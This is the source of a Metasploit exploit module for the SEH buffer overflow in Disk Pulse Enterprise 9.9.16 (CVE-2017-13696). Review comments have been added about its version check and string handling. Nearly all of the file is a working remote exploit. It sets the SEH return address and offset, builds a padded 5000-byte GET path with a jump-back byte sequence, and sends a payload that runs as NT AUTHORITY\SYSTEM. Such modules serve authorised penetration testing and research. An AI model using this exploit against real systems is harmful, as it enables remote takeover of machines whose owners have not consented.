GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  # Module metadata: name, description, authors, references
  # (CVE-2017-13696, EDB 42560), payload constraints (alpha_mixed encoder,
  # bad characters), the single supported target with its SEH handler
  # address and offset, and the default RPORT option (80).
  #
  # @param info [Hash] module info merged with the defaults below
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Disk Pulse Enterprise GET Buffer Overflow',
        'Description' => %q{
          This module exploits an SEH buffer overflow in Disk Pulse Enterprise
          9.9.16. If a malicious user sends a crafted HTTP GET request
          it is possible to execute a payload that would run under the Windows
          NT AUTHORITY\SYSTEM account.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Chance Johnson', # msf module - [email protected]
          'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com
        ],
        'References' => [
          [ 'CVE', '2017-13696' ],
          [ 'EDB', '42560' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'win',
        'Payload' => {
          'EncoderType' => "alpha_mixed",
          # Bytes that must not appear in the encoded payload.
          'BadChars' => "\x00\x0a\x0d\x26"
        },
        'Targets' => [
          [
            'Disk Pulse Enterprise 9.9.16',
            {
              'Ret' => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll
              'Offset' => 2492 # distance from the start of the buffer to the SEH record
            }
          ]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2017-08-25',
        'DefaultTarget' => 0,
        # Reliability/stability/side-effect ratings are left UNKNOWN; nothing in
        # this module records them.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(80)])
  end

  # Banner-based version check: one GET to '/' and a regex over the body.
  #
  # @return [Msf::Exploit::CheckCode] Appears when the response is HTTP 200 and
  #   the body contains "Disk Pulse Enterprise v9.9.16"; Safe in every other case.
  #   NOTE(review): a missing response (nil) or a non-200 status is also reported
  #   as Safe rather than Unknown, so an unreachable or differently-configured
  #   host reads as "not vulnerable" — confirm this is the intended semantics.
  def check
    res = send_request_cgi(
      'uri' => '/',
      'method' => 'GET'
    )

    # Version-string match only; this does not exercise the overflow itself.
    if res && res.code == 200 && res.body =~ /Disk Pulse Enterprise v9\.9\.16/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  # Builds the request buffer and sends it as the path of a single GET, then
  # hands off to the payload handler.
  #
  # Buffer layout, in order: the encoded payload, 'A' filler up to
  # target['Offset'], the SEH record from generate_seh_record(target.ret),
  # 10 NOPs, a 5-byte jump, then 'B' padding to a fixed total of 5000 bytes.
  #
  # NOTE(review): `exp` is whatever String object payload.encoded returns, and
  # every `<<` below appends to that object in place. If payload.encoded is a
  # cached String (which the second call on the filler line presumably relies
  # on for its length), the cached payload is mutated for the rest of this run;
  # confirm nothing later reads payload.encoded expecting the original bytes
  # (a `.dup` at the first assignment would avoid the aliasing).
  def exploit
    connect

    print_status("Generating exploit...")
    exp = payload.encoded
    # The right-hand side is evaluated before the append, so the filler length
    # is computed from the payload alone.
    exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset
    exp << generate_seh_record(target.ret)
    exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode
    exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start
    # Total request path is padded to exactly 5000 bytes regardless of payload size.
    exp << 'B' * (5000 - exp.length) # padding

    print_status("Sending exploit...")

    # 'host' and 'connection' are literal request options handed straight to
    # send_request_cgi; which header each maps to is not visible in this file
    # (presumably Host and Connection — verify against HttpClient).
    send_request_cgi(
      'uri' => '/../' + exp,
      'method' => 'GET',
      'host' => '4.2.2.2',
      'connection' => 'keep-alive'
    )

    handler
    disconnect
  end
end